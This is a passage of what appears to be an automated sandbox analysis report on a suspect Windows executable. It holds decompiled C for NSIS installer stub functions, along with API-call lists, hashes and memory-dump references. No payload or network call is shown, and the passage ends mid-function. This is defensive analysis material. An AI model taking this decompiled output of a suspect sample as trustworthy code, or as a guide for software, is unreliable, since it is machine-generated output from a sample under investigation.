                    0x00403aec
                    0x00403aee
                    0x00403af3
                    0x00403af0
                    0x00403af0
                    0x00403af0
                    0x00403b03
                    0x00403b1b
                    0x00403b1d
                    0x00403b23
                    0x00403b38
                    0x00403b25
                    0x00403b2e
                    0x00403b30
                    0x00403b30
                    0x00403b3e
                    0x00403b4e
                    0x00403b5f
                    0x00403b66
                    0x00403b6c
                    0x00403b70
                    0x00403b75
                    0x00403b77
                    0x00000000
                    0x00403b7d
                    0x00403b7d
                    0x00403b7f
                    0x00000000
                    0x00000000
                    0x00403b85
                    0x00403b89
                    0x00403bae
                    0x00403bb4
                    0x00403bba
                    0x00403bbc
                    0x00000000
                    0x00000000
                    0x00403be2
                    0x00403be8
                    0x00403bea
                    0x00403bef
                    0x00000000
                    0x00000000
                    0x00403bf5
                    0x00403bf8
                    0x00403bfb
                    0x00403c12
                    0x00403c1e
                    0x00403c37
                    0x00403c3d
                    0x00403c41
                    0x00403c46
                    0x00403c4c
                    0x00000000
                    0x00000000
                    0x00403c56
                    0x00403c61
                    0x00000000
                    0x00403c61
                    0x00403b8b
                    0x00403b91
                    0x00000000
                    0x00000000
                    0x00403b97
                    0x00403b9d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403ba3
                    0x00403b77
                    0x00403c6e
                    0x00403c7a
                    0x00403c81
                    0x00000000
                    0x004039d2
                    0x004039d2
                    0x004039d5
                    0x00403a08
                    0x00403a08
                    0x00403a0a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403a0a
                    0x004039d7
                    0x004039db
                    0x004039e0
                    0x004039e2
                    0x00000000
                    0x00000000
                    0x004039f2
                    0x004039fa
                    0x00000000
                    0x00403a00
                    0x0040382e
                    0x0040382e
                    0x00403832
                    0x00403837
                    0x00403846
                    0x00403846
                    0x0040384f
                    0x00403858
                    0x00403863
                    0x00403863
                    0x0040386f
                    0x0040388b
                    0x0040388e
                    0x004038a1
                    0x004038a7
                    0x0040394a
                    0x00000000
                    0x00403953
                    0x004038ad
                    0x004038ba
                    0x004038bc
                    0x004038be
                    0x004038dd
                    0x004038dd
                    0x004038e0
                    0x004038e5
                    0x004038e8
                    0x004038f8
                    0x004038f9
                    0x004038fb
                    0x00403931
                    0x00403944
                    0x00000000
                    0x00403944
                    0x004038fd
                    0x00403903
                    0x0040391c
                    0x00403921
                    0x00403923
                    0x00000000
                    0x00000000
                    0x00403925
                    0x00403911
                    0x00403911
                    0x00403913
                    0x00403913
                    0x00000000
                    0x00403913
                    0x00403906
                    0x0040390b
                    0x00000000
                    0x0040390b
                    0x004038ea
                    0x004038f0
                    0x00000000
                    0x00000000
                    0x004038f2
                    0x00000000
                    0x004038f2
                    0x004038e2
                    0x00000000
                    0x004038e2
                    0x004038c8
                    0x004038cf
                    0x004038d5
                    0x004038d7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004038d7
                    0x00403893
                    0x00000000
                    0x00403871
                    0x00403877
                    0x00403881
                    0x00403c87
                    0x00403c8d
                    0x00403c8f
                    0x00403c95
                    0x00403c9a
                    0x00403ca0
                    0x00403ca0
                    0x00403c95
                    0x00403caa
                    0x00000000
                    0x00403caa
                    0x0040386f

                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                    • ShowWindow.USER32(?), ref: 00403863
                    • DestroyWindow.USER32 ref: 00403877
                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403893
                    • GetDlgItem.USER32 ref: 004038B4
                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004038C8
                    • IsWindowEnabled.USER32(00000000), ref: 004038CF
                    • GetDlgItem.USER32 ref: 0040397D
                    • GetDlgItem.USER32 ref: 00403987
                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 004039A1
                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004039F2
                    • GetDlgItem.USER32 ref: 00403A98
                    • ShowWindow.USER32(00000000,?), ref: 00403AB9
                    • EnableWindow.USER32(?,?), ref: 00403ACB
                    • EnableWindow.USER32(?,?), ref: 00403AE6
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403AFC
                    • EnableMenuItem.USER32 ref: 00403B03
                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403B1B
                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403B2E
                    • lstrlenA.KERNEL32(00429FD8,?,00429FD8,foxdilaoqebdbpxrsdbw Setup), ref: 00403B57
                    • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                    • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                    Strings
                    • foxdilaoqebdbpxrsdbw Setup, xrefs: 00403B48
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                    • String ID: foxdilaoqebdbpxrsdbw Setup
                    • API String ID: 4050669955-2628631277
                    • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                    • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                    • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                    • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403489, Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 213stringregistrylibraryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E00403489() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x42eb70; // 0x6bfe70
				_t20 = E00405C49(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x429fd8;
					"1033" = 0x7830;
					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
					__eflags =  *0x429fd8;
					if(__eflags == 0) {
						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405889("1033",  *_t20() & 0x0000ffff);
				}
				E0040373D(_t75, _t87);
				_t24 =  *0x42eb78; // 0x80
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42ebe0 = _t24 & 0x00000020;
				if(E004054FF(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004054FF(_t95, _t84) == 0) {
						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e348 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E0040373D(_t75, __eflags);
							__eflags =  *0x42ec00; // 0x0
							if(__eflags != 0) {
								_t31 = E00404D9B(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e32c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x429fb0, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e300);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e300);
								 *0x42e324 = _t85;
								RegisterClassA(0x42e300);
							}
							_t39 =  *0x42e340; // 0x0
							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x42eb60; // 0x400000
						 *0x42e314 = _t28;
						_v20 = 0x624e5f;
						 *0x42e304 = E00401000;
						 *0x42e310 = _t75;
						 *0x42e324 =  &_v20;
						if(RegisterClassA(0x42e300) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x42eb98; // 0x6c3bb4
					_t78 = 0x42db00;
					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
					_t61 =  *0x42db00; // 0x71
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x42db01;
						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E0040592B(_t84, E0040541E(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405465(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                    0x0040348f
                    0x00403498
                    0x0040349f
                    0x004034a1
                    0x004034b5
                    0x004034c7
                    0x004034d1
                    0x004034d6
                    0x004034dc
                    0x004034ef
                    0x004034ef
                    0x004034fa
                    0x004034a3
                    0x004034ae
                    0x004034ae
                    0x004034ff
                    0x00403504
                    0x00403509
                    0x00403512
                    0x0040351e
                    0x004035a5
                    0x004035ad
                    0x004035b6
                    0x004035b6
                    0x004035cc
                    0x004035d2
                    0x004035e0
                    0x0040366f
                    0x00403677
                    0x00403681
                    0x00403686
                    0x0040368c
                    0x0040370b
                    0x00403710
                    0x00403712
                    0x0040372e
                    0x00000000
                    0x0040372e
                    0x00403714
                    0x0040371a
                    0x00403722
                    0x00403722
                    0x00000000
                    0x0040371a
                    0x00403696
                    0x004036a7
                    0x004036a9
                    0x004036ab
                    0x004036b2
                    0x004036b2
                    0x004036ba
                    0x004036c2
                    0x004036c4
                    0x004036c6
                    0x004036cf
                    0x004036d2
                    0x004036d8
                    0x004036d8
                    0x004036de
                    0x004036f7
                    0x00403701
                    0x00000000
                    0x00403706
                    0x00403679
                    0x0040367b
                    0x00000000
                    0x004035e6
                    0x004035e6
                    0x004035ec
                    0x004035f6
                    0x004035fe
                    0x00403608
                    0x0040360e
                    0x0040361c
                    0x00403733
                    0x00403733
                    0x00000000
                    0x00403733
                    0x00403622
                    0x0040362b
                    0x0040366a
                    0x00000000
                    0x0040366a
                    0x00403524
                    0x00403524
                    0x00403529
                    0x00000000
                    0x00000000
                    0x0040352e
                    0x00403533
                    0x00403543
                    0x00403548
                    0x0040354f
                    0x00000000
                    0x00000000
                    0x00403553
                    0x00403555
                    0x00403562
                    0x00403562
                    0x0040356a
                    0x00403570
                    0x00403598
                    0x004035a0
                    0x00000000
                    0x00403582
                    0x00403583
                    0x0040358c
                    0x00403592
                    0x00403593
                    0x00000000
                    0x00403593
                    0x0040358e
                    0x00403590
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403590
                    0x00403570

                    APIs
                      • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                      • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                      • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                    • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                    • lstrlenA.KERNEL32(qdrjldxxem,?,?,?,qdrjldxxem,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\U001P56ybm.exe" ), ref: 00403565
                    • lstrcmpiA.KERNEL32(?,.exe,qdrjldxxem,?,?,?,qdrjldxxem,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                    • GetFileAttributesA.KERNEL32(qdrjldxxem), ref: 00403583
                    • LoadImageA.USER32 ref: 004035CC
                      • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                    • RegisterClassA.USER32 ref: 00403613
                    • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                    • CreateWindowExA.USER32 ref: 00403664
                    • ShowWindow.USER32(00000005,00000000), ref: 00403696
                    • LoadLibraryA.KERNELBASE(RichEd20), ref: 004036A7
                    • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                    • GetClassInfoA.USER32 ref: 004036C2
                    • GetClassInfoA.USER32 ref: 004036CF
                    • RegisterClassA.USER32 ref: 004036D8
                    • DialogBoxParamA.USER32 ref: 004036F7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                    • String ID: "C:\Users\user\Desktop\U001P56ybm.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$qdrjldxxem
                    • API String ID: 914957316-3549551381
                    • Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                    • Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
                    • Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                    • Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402C0B, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E00402C0B(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\hardz\\Desktop\\U001P56ybm.exe";
				 *0x42eb6c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\U001P56ybm.exe", 0x400);
				_t89 = E00405602(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409010 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\hardz\\Desktop";
				E0040592B("C:\\Users\\hardz\\Desktop", _t91);
				E0040592B(0x436000, E00405465(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428b88 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BB0(1);
					__eflags =  *0x42eb74 - _t82; // 0x8200
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42eb74; // 0x8200
						E00403098(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E44();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42eb70 = _t94;
							 *0x42eb78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42eb7c =  *0x42eb7c + 1;
								__eflags =  *0x42eb7c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E004055C3(0x42eb80, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403098( *0x414b78);
					_t65 = E00403066( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42eb74; // 0x8200
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403066(0x420b88, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BB0(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42eb74;
						if( *0x42eb74 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BB0(0);
							}
							goto L20;
						}
						E004055C3( &_v44, 0x420b88, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414b78; // 0x497ec
						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42eb74 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409154
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428b88; // 0x497f0
						if(__eflags < 0) {
							_v12 = E00405CB5(_v12, 0x420b88, _t90);
						}
						 *0x414b78 =  *0x414b78 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                    0x00402c13
                    0x00402c16
                    0x00402c19
                    0x00402c1c
                    0x00402c22
                    0x00402c33
                    0x00402c38
                    0x00402c4b
                    0x00402c50
                    0x00402c53
                    0x00402c59
                    0x00000000
                    0x00402c5b
                    0x00402c66
                    0x00402c6c
                    0x00402c7d
                    0x00402c84
                    0x00402c8a
                    0x00402c8c
                    0x00402c91
                    0x00402c93
                    0x00402d80
                    0x00402d82
                    0x00402d87
                    0x00402d8e
                    0x00000000
                    0x00000000
                    0x00402d90
                    0x00402d93
                    0x00402db7
                    0x00402dbc
                    0x00402dc2
                    0x00402dc4
                    0x00402dcd
                    0x00402dd2
                    0x00402dd5
                    0x00402dd6
                    0x00402dd7
                    0x00402dd9
                    0x00402dde
                    0x00402de1
                    0x00402df4
                    0x00402df8
                    0x00402e00
                    0x00402e05
                    0x00402e07
                    0x00402e07
                    0x00402e07
                    0x00402e0f
                    0x00402e0f
                    0x00402e12
                    0x00402e13
                    0x00402e13
                    0x00402e16
                    0x00402e18
                    0x00402e18
                    0x00402e18
                    0x00402e22
                    0x00402e28
                    0x00402e36
                    0x00402e3b
                    0x00000000
                    0x00402e3b
                    0x00000000
                    0x00402de1
                    0x00402d9b
                    0x00402da6
                    0x00402dab
                    0x00402dad
                    0x00000000
                    0x00000000
                    0x00402db2
                    0x00402db5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402c99
                    0x00402c9e
                    0x00402c9e
                    0x00402ca3
                    0x00402ca7
                    0x00402cae
                    0x00402cb3
                    0x00402cb5
                    0x00402cb7
                    0x00402cb7
                    0x00402cbb
                    0x00402cc0
                    0x00402cc2
                    0x00402dec
                    0x00402de3
                    0x00000000
                    0x00402de3
                    0x00402cc8
                    0x00402ccf
                    0x00402d4b
                    0x00402d4f
                    0x00402d53
                    0x00402d58
                    0x00000000
                    0x00402d4f
                    0x00402cd8
                    0x00402cdd
                    0x00402ce0
                    0x00402ce5
                    0x00000000
                    0x00000000
                    0x00402ce7
                    0x00402cee
                    0x00000000
                    0x00000000
                    0x00402cf0
                    0x00402cf7
                    0x00000000
                    0x00000000
                    0x00402cf9
                    0x00402d00
                    0x00000000
                    0x00000000
                    0x00402d02
                    0x00402d09
                    0x00000000
                    0x00000000
                    0x00402d0b
                    0x00402d11
                    0x00402d1a
                    0x00402d20
                    0x00402d23
                    0x00402d25
                    0x00402d2b
                    0x00000000
                    0x00000000
                    0x00402d31
                    0x00402d35
                    0x00402d3d
                    0x00402d3d
                    0x00402d40
                    0x00402d40
                    0x00402d43
                    0x00402d45
                    0x00402d47
                    0x00402d47
                    0x00000000
                    0x00402d45
                    0x00402d37
                    0x00402d3b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402d59
                    0x00402d59
                    0x00402d5f
                    0x00402d6b
                    0x00402d6b
                    0x00402d6e
                    0x00402d74
                    0x00402d76
                    0x00402d76
                    0x00402d7e
                    0x00402d7e
                    0x00000000
                    0x00402d7e

                    APIs
                    • GetTickCount.KERNEL32 ref: 00402C1C
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\U001P56ybm.exe,00000400), ref: 00402C38
                      • Part of subcall function 00405602: GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\U001P56ybm.exe,80000000,00000003), ref: 00405606
                      • Part of subcall function 00405602: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                    • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\U001P56ybm.exe,C:\Users\user\Desktop\U001P56ybm.exe,80000000,00000003), ref: 00402C84
                    Strings
                    • Inst, xrefs: 00402CF0
                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DE3
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C0B
                    • Error launching installer, xrefs: 00402C5B
                    • soft, xrefs: 00402CF9
                    • C:\Users\user\Desktop, xrefs: 00402C66, 00402C6B, 00402C71
                    • C:\Users\user\Desktop\U001P56ybm.exe, xrefs: 00402C22, 00402C31, 00402C45, 00402C65
                    • "C:\Users\user\Desktop\U001P56ybm.exe" , xrefs: 00402C15
                    • Null, xrefs: 00402D02
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                    • String ID: "C:\Users\user\Desktop\U001P56ybm.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\U001P56ybm.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                    • API String ID: 4283519449-3040409799
                    • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                    • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                    • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                    • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 60%
                    			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E0040548B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b78);
					E0040592B();
				}
				E00405B89(0x409b78);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405C22(0x409b78);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004055E3(0x409b78);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404CC9(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42ebe8;
						goto L32;
